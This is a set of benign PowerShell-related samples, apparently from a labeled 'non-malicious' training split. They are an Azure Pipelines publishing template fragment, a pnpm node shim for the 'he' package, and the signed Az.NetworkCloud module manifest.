ne(variables['System.TeamProject'], 'public'), notin(variables['Build.Reason'], 'PullRequest')) }}: - task: DownloadBuildArtifacts@0 displayName: Download artifact inputs: artifactName: AssetManifests downloadPath: '$(Build.StagingDirectory)/Download' checkDownloadedFiles: true condition: ${{ parameters.condition }} continueOnError: ${{ parameters.continueOnError }} - task: NuGetAuthenticate@1 - task: PowerShell@2 displayName: Publish Build Assets inputs: filePath: eng\common\sdk-task.ps1 arguments: -task PublishBuildAssets -restore -msbuildEngine dotnet /p:ManifestsPath='$(Build.StagingDirectory)/Download/AssetManifests' /p:BuildAssetRegistryToken=$(MaestroAccessToken) /p:MaestroApiEndpoint=https://maestro-prod.westus2.cloudapp.azure.com /p:PublishUsingPipelines=${{ parameters.publishUsingPipelines }} /p:OfficialBuildId=$(Build.BuildNumber) condition: ${{ parameters.condition }} continueOnError: ${{ parameters.continueOnError }} - task: powershell@2 displayName: Create ReleaseConfigs Artifact inputs: targetType: inline script: | New-Item -Path "$(Build.StagingDirectory)/ReleaseConfigs" -ItemType Directory -Force $filePath = "$(Build.StagingDirectory)/ReleaseConfigs/ReleaseConfigs.txt" Add-Content -Path $filePath -Value $(BARBuildId) Add-Content -Path $filePath -Value "$(DefaultChannels)" Add-Content -Path $filePath -Value $(IsStableBuild) - task: 1ES.PublishBuildArtifacts@1 displayName: Publish ReleaseConfigs Artifact inputs: PathtoPublish: '$(Build.StagingDirectory)/ReleaseConfigs' PublishLocation: Container ArtifactName: ReleaseConfigs - task: powershell@2 displayName: Check if SymbolPublishingExclusionsFile.txt exists inputs: targetType: inline script: | $symbolExclusionfile = "$(Build.SourcesDirectory)/eng/SymbolPublishingExclusionsFile.txt" if(Test-Path -Path $symbolExclusionfile) { Write-Host "SymbolExclusionFile exists" Write-Host "##vso[task.setvariable variable=SymbolExclusionFile]true" } else{ Write-Host "Symbols Exclusion file does not exists" Write-Host "##vso[task.setvariable variable=SymbolExclusionFile]false" } - task: 1ES.PublishBuildArtifacts@1 displayName: Publish SymbolPublishingExclusionsFile Artifact condition: eq(variables['SymbolExclusionFile'], 'true') inputs: PathtoPublish: '$(Build.SourcesDirectory)/eng/SymbolPublishingExclusionsFile.txt' PublishLocation: Container ArtifactName: ReleaseConfigs - ${{ if eq(parameters.publishAssetsImmediately, 'true') }}: - template: /eng/common/templates-official/post-build/setup-maestro-vars.yml parameters: BARBuildId: ${{ parameters.BARBuildId }} PromoteToChannelIds: ${{ parameters.PromoteToChannelIds }} - task: PowerShell@2 displayName: Publish Using Darc inputs: filePath: $(Build.SourcesDirectory)/eng/common/post-build/publish-using-darc.ps1 arguments: -BuildId $(BARBuildId) -PublishingInfraVersion 3 -AzdoToken '$(publishing-dnceng-devdiv-code-r-build-re)' -MaestroToken '$(MaestroApiAccessToken)' -WaitPublishingFinish true -ArtifactsPublishingAdditionalParameters '${{ parameters.artifactsPublishingAdditionalParameters }}' -SymbolPublishingAdditionalParameters '${{ parameters.symbolPublishingAdditionalParameters }}' - ${{ if eq(parameters.enablePublishBuildArtifacts, 'true') }}: - template: /eng/common/templates-official/steps/publish-logs.yml parameters: JobLabel: 'Publish_Artifacts_Logs'
combined_dataset/train/non-malicious/sample_31_21.ps1
sample_31_21.ps1
#!/usr/bin/env pwsh $basedir=Split-Path $MyInvocation.MyCommand.Definition -Parent $exe="" $pathsep=":" $env_node_path=$env:NODE_PATH $new_node_path="C:\Users\abder\component-maker\web\node_modules\.pnpm\he@1.2.0\node_modules\he\bin\node_modules;C:\Users\abder\component-maker\web\node_modules\.pnpm\he@1.2.0\node_modules\he\node_modules;C:\Users\abder\component-maker\web\node_modules\.pnpm\he@1.2.0\node_modules;C:\Users\abder\component-maker\web\node_modules\.pnpm\node_modules" if ($PSVersionTable.PSVersion -lt "6.0" -or $IsWindows) { # Fix case when both the Windows and Linux builds of Node # are installed in the same directory $exe=".exe" $pathsep=";" } else { $new_node_path="/mnt/c/Users/abder/component-maker/web/node_modules/.pnpm/he@1.2.0/node_modules/he/bin/node_modules:/mnt/c/Users/abder/component-maker/web/node_modules/.pnpm/he@1.2.0/node_modules/he/node_modules:/mnt/c/Users/abder/component-maker/web/node_modules/.pnpm/he@1.2.0/node_modules:/mnt/c/Users/abder/component-maker/web/node_modules/.pnpm/node_modules" } if ([string]::IsNullOrEmpty($env_node_path)) { $env:NODE_PATH=$new_node_path } else { $env:NODE_PATH="$new_node_path$pathsep$env_node_path" } $ret=0 if (Test-Path "$basedir/node$exe") { # Support pipeline input if ($MyInvocation.ExpectingInput) { $input | & "$basedir/node$exe" "$basedir/../../bin/he" $args } else { & "$basedir/node$exe" "$basedir/../../bin/he" $args } $ret=$LASTEXITCODE } else { # Support pipeline input if ($MyInvocation.ExpectingInput) { $input | & "node$exe" "$basedir/../../bin/he" $args } else { & "node$exe" "$basedir/../../bin/he" $args } $ret=$LASTEXITCODE } $env:NODE_PATH=$env_node_path exit $ret
combined_dataset/train/non-malicious/sample_43_50.ps1
sample_43_50.ps1
# # Module manifest for module 'Az.NetworkCloud' # # Generated by: Microsoft Corporation # # Generated on: 23/04/2024 # @{ # Script module or binary module file associated with this manifest. RootModule = 'Az.NetworkCloud.psm1' # Version number of this module. ModuleVersion = '1.0.1' # Supported PSEditions CompatiblePSEditions = 'Core', 'Desktop' # ID used to uniquely identify this module GUID = 'c1da95ce-b8cb-46c5-bb1c-80e3132dbb72' # Author of this module Author = 'Microsoft Corporation' # Company or vendor of this module CompanyName = 'Microsoft Corporation' # Copyright statement for this module Copyright = 'Microsoft Corporation. All rights reserved.' # Description of the functionality provided by this module Description = 'Microsoft Azure PowerShell: NetworkCloud cmdlets' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '5.1' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. DotNetFrameworkVersion = '4.7.2' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @() # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'NetworkCloud.Autorest/bin/Az.NetworkCloud.private.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module FormatsToProcess = 'NetworkCloud.Autorest\Az.NetworkCloud.format.ps1xml' # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess NestedModules = @('NetworkCloud.Autorest/Az.NetworkCloud.psm1') # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = 'Deploy-AzNetworkCloudCluster', 'Disable-AzNetworkCloudStorageApplianceRemoteVendorManagement', 'Enable-AzNetworkCloudStorageApplianceRemoteVendorManagement', 'Get-AzNetworkCloudAgentPool', 'Get-AzNetworkCloudBareMetalMachine', 'Get-AzNetworkCloudBareMetalMachineKeySet', 'Get-AzNetworkCloudBmcKeySet', 'Get-AzNetworkCloudCluster', 'Get-AzNetworkCloudClusterManager', 'Get-AzNetworkCloudConsole', 'Get-AzNetworkCloudKubernetesCluster', 'Get-AzNetworkCloudL2Network', 'Get-AzNetworkCloudL3Network', 'Get-AzNetworkCloudMetricsConfiguration', 'Get-AzNetworkCloudRack', 'Get-AzNetworkCloudRackSku', 'Get-AzNetworkCloudServicesNetwork', 'Get-AzNetworkCloudStorageAppliance', 'Get-AzNetworkCloudTrunkedNetwork', 'Get-AzNetworkCloudVirtualMachine', 'Get-AzNetworkCloudVolume', 'Invoke-AzNetworkCloudBareMetalMachineCordon', 'Invoke-AzNetworkCloudBareMetalMachineDataExtract', 'Invoke-AzNetworkCloudBareMetalMachineReimage', 'Invoke-AzNetworkCloudBareMetalMachineReplace', 'Invoke-AzNetworkCloudBareMetalMachineRunCommand', 'Invoke-AzNetworkCloudBareMetalMachineRunReadCommand', 'Invoke-AzNetworkCloudBareMetalMachineUncordon', 'Invoke-AzNetworkCloudClusterVersionUpdate', 'Invoke-AzNetworkCloudVirtualMachineReimage', 'New-AzNetworkCloudAgentPool', 'New-AzNetworkCloudBareMetalMachineConfigurationDataObject', 'New-AzNetworkCloudBareMetalMachineKeySet', 'New-AzNetworkCloudBgpAdvertisementObject', 'New-AzNetworkCloudBgpServiceLoadBalancerConfigurationObject', 'New-AzNetworkCloudBmcKeySet', 'New-AzNetworkCloudCluster', 'New-AzNetworkCloudClusterManager', 'New-AzNetworkCloudConsole', 'New-AzNetworkCloudControlPlaneNodeConfigurationObject', 'New-AzNetworkCloudEgressEndpointObject', 'New-AzNetworkCloudEndpointDependencyObject', 'New-AzNetworkCloudInitialAgentPoolConfigurationObject', 'New-AzNetworkCloudIpAddressPoolObject', 'New-AzNetworkCloudKeySetUserObject', 'New-AzNetworkCloudKubernetesCluster', 'New-AzNetworkCloudL2Network', 'New-AzNetworkCloudL3Network', 'New-AzNetworkCloudL3NetworkAttachmentConfigurationObject', 'New-AzNetworkCloudMetricsConfiguration', 'New-AzNetworkCloudNetworkAttachmentObject', 'New-AzNetworkCloudRackDefinitionObject', 'New-AzNetworkCloudServiceLoadBalancerBgpPeerObject', 'New-AzNetworkCloudServicesNetwork', 'New-AzNetworkCloudStorageApplianceConfigurationDataObject', 'New-AzNetworkCloudTrunkedNetwork', 'New-AzNetworkCloudVirtualMachine', 'New-AzNetworkCloudVirtualMachinePlacementHintObject', 'New-AzNetworkCloudVolume', 'Remove-AzNetworkCloudAgentPool', 'Remove-AzNetworkCloudBareMetalMachineKeySet', 'Remove-AzNetworkCloudBmcKeySet', 'Remove-AzNetworkCloudCluster', 'Remove-AzNetworkCloudClusterManager', 'Remove-AzNetworkCloudConsole', 'Remove-AzNetworkCloudKubernetesCluster', 'Remove-AzNetworkCloudL2Network', 'Remove-AzNetworkCloudL3Network', 'Remove-AzNetworkCloudMetricsConfiguration', 'Remove-AzNetworkCloudServicesNetwork', 'Remove-AzNetworkCloudTrunkedNetwork', 'Remove-AzNetworkCloudVirtualMachine', 'Remove-AzNetworkCloudVolume', 'Restart-AzNetworkCloudBareMetalMachine', 'Restart-AzNetworkCloudKubernetesClusterNode', 'Restart-AzNetworkCloudVirtualMachine', 'Start-AzNetworkCloudBareMetalMachine', 'Start-AzNetworkCloudVirtualMachine', 'Stop-AzNetworkCloudBareMetalMachine', 'Stop-AzNetworkCloudVirtualMachine', 'Update-AzNetworkCloudAgentPool', 'Update-AzNetworkCloudBareMetalMachine', 'Update-AzNetworkCloudBareMetalMachineKeySet', 'Update-AzNetworkCloudBmcKeySet', 'Update-AzNetworkCloudCluster', 'Update-AzNetworkCloudClusterManager', 'Update-AzNetworkCloudConsole', 'Update-AzNetworkCloudKubernetesCluster', 'Update-AzNetworkCloudL2Network', 'Update-AzNetworkCloudL3Network', 'Update-AzNetworkCloudMetricsConfiguration', 'Update-AzNetworkCloudRack', 'Update-AzNetworkCloudServicesNetwork', 'Update-AzNetworkCloudStorageAppliance', 'Update-AzNetworkCloudTrunkedNetwork', 'Update-AzNetworkCloudVirtualMachine', 'Update-AzNetworkCloudVolume' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = @() # Variables to export from this module # VariablesToExport = @() # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = @() # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'Azure','ResourceManager','ARM','PSModule','NetworkCloud' # A URL to the license for this module. LicenseUri = 'https://aka.ms/azps-license' # A URL to the main website for this project. ProjectUri = 'https://github.com/Azure/azure-powershell' # A URL to an icon representing this module. # IconUri = '' # ReleaseNotes of this module ReleaseNotes = '* Introduced secrets detection feature to safeguard sensitive data.' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' } # SIG # Begin signature block # MIInvwYJKoZIhvcNAQcCoIInsDCCJ6wCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCAnuFLI4rUH/AJK # 9i5ERdsrQZpWW6HfBv2BSws/Rsr/DKCCDXYwggX0MIID3KADAgECAhMzAAADrzBA # DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA # hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG # 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN # xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL # go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB # tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd # mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ # 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY # 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp # XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn # TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT # e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG # OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O # PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk # ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx # HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt # CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGZ8wghmbAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEID1Mqza5tAeqV+fcrxQW7FqL # GEK+2v2q+z5VJXgnv1isMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAY37DPT9orb3+Ki/IlixXhFLG74ggLrTNPNcmL0bcadVEPgNtk+q8LXsk # zgwYrfKStdoWyG4hyLn7c+u8SPADBMNrXXyBskKsQywyQH8OfwjfgEsxnZlnO1u8 # hQeoO5aF7g5fWtnnmJJWP8IGIFb5PzYEOSS1Qaymuc9awL6Lt3rkfAjoQ/H9UNJy # aDK7D+l/YrVXlDINqsSuQx9E8gaL9FvtRA6JeCkZ1MOW1tyX42A7BXIbMtGsPu6F # p4qNa0Lx8iiI2Tw4rNgmknO2sLtC0R8Bwgf2qqoAhKiaZp6TJb6BgaGRF+cgyZcj # nTnj9rTZxnxiITiFEpZdp8IeDcEk6aGCFykwghclBgorBgEEAYI3AwMBMYIXFTCC # FxEGCSqGSIb3DQEHAqCCFwIwghb+AgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFZBgsq # hkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCBtQI7IgHsIqufTzGdHGDzRn0vuI0VRXPka/VGnm8BOfwIGZh/SmZXW # GBMyMDI0MDQyMzE0MTExNy41MDZaMASAAgH0oIHYpIHVMIHSMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl # bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNO # OjNCRDQtNEI4MC02OUMzMSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT # ZXJ2aWNloIIReDCCBycwggUPoAMCAQICEzMAAAHlj2rA8z20C6MAAQAAAeUwDQYJ # KoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwHhcNMjMx # MDEyMTkwNzM1WhcNMjUwMTEwMTkwNzM1WjCB0jELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3Bl # cmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjozQkQ0LTRC # ODAtNjlDMzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZTCC # AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAKl74Drau2O6LLrJO3HyTvO9 # aXai//eNyP5MLWZrmUGNOJMPwMI08V9zBfRPNcucreIYSyJHjkMIUGmuh0rPV5/2 # +UCLGrN1P77n9fq/mdzXMN1FzqaPHdKElKneJQ8R6cP4dru2Gymmt1rrGcNe800C # cD6d/Ndoommkd196VqOtjZFA1XWu+GsFBeWHiez/PllqcM/eWntkQMs0lK0zmCfH # +Bu7i1h+FDRR8F7WzUr/7M3jhVdPpAfq2zYCA8ZVLNgEizY+vFmgx+zDuuU/GChD # K7klDcCw+/gVoEuSOl5clQsydWQjJJX7Z2yV+1KC6G1JVqpP3dpKPAP/4udNqpR5 # HIeb8Ta1JfjRUzSv3qSje5y9RYT/AjWNYQ7gsezuDWM/8cZ11kco1JvUyOQ8x/JD # kMFqSRwj1v+mc6LKKlj//dWCG/Hw9ppdlWJX6psDesQuQR7FV7eCqV/lfajoLpPN # x/9zF1dv8yXBdzmWJPeCie2XaQnrAKDqlG3zXux9tNQmz2L96TdxnIO2OGmYxBAA # ZAWoKbmtYI+Ciz4CYyO0Fm5Z3T40a5d7KJuftF6CToccc/Up/jpFfQitLfjd71cS # +cLCeoQ+q0n0IALvV+acbENouSOrjv/QtY4FIjHlI5zdJzJnGskVJ5ozhji0YRsc # v1WwJFAuyyCMQvLdmPddAgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQU3/+fh7tNczEi # fEXlCQgFOXgMh6owHwYDVR0jBBgwFoAUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXwYD # VR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9j # cmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3JsMGwG # CCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIw # MjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcD # CDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBADP6whOFjD1ad8Gk # EJ9oLBuvfjndMyGQ9R4HgBKSlPt3pa0XVLcimrJlDnKGgFBiWwI6XOgw82hdolDi # MDBLLWRMTJHWVeUY1gU4XB8OOIxBc9/Q83zb1c0RWEupgC48I+b+2x2VNgGJUsQI # yPR2PiXQhT5PyerMgag9OSodQjFwpNdGirna2rpV23EUwFeO5+3oSX4JeCNZvgyU # OzKpyMvqVaubo+Glf/psfW5tIcMjZVt0elswfq0qJNQgoYipbaTvv7xmixUJGTbi # xYifTwAivPcKNdeisZmtts7OHbAM795ZvKLSEqXiRUjDYZyeHyAysMEALbIhdXgH # Eh60KoZyzlBXz3VxEirE7nhucNwM2tViOlwI7EkeU5hudctnXCG55JuMw/wb7c71 # RKimZA/KXlWpmBvkJkB0BZES8OCGDd+zY/T9BnTp8si36Tql84VfpYe9iHmy7Pqq # xqMF2Cn4q2a0mEMnpBruDGE/gR9c8SVJ2ntkARy5SfluuJ/MB61yRvT1mUx3lypp # O22ePjBjnwoEvVxbDjT1jhdMNdevOuDeJGzRLK9HNmTDC+TdZQlj+VMgIm8ZeEIR # NF0oaviF+QZcUZLWzWbYq6yDok8EZKFiRR5otBoGLvaYFpxBZUE8mnLKuDlYobjr # xh7lnwrxV/fMy0F9fSo2JxFmtLgtMIIHcTCCBVmgAwIBAgITMwAAABXF52ueAptJ # mQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgT # Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m # 